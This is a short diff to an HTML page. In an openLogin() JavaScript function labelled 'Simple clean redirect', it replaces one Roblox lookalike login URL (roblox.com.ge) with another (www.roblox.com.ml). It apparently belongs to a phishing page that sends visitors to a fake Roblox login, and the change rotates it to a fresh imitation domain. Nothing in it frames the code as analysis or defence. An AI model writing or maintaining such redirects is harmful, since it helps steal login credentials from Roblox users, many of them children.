--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@
 
     // Simple clean redirect
     function openLogin() {
-      window.location.href = "https://roblox.com.ge/login?returnUrl=9924072593518852";
+      window.location.href = "https://www.roblox.com.ml/login?returnUrl=685940214913819";
     }
   </script>
 </body>
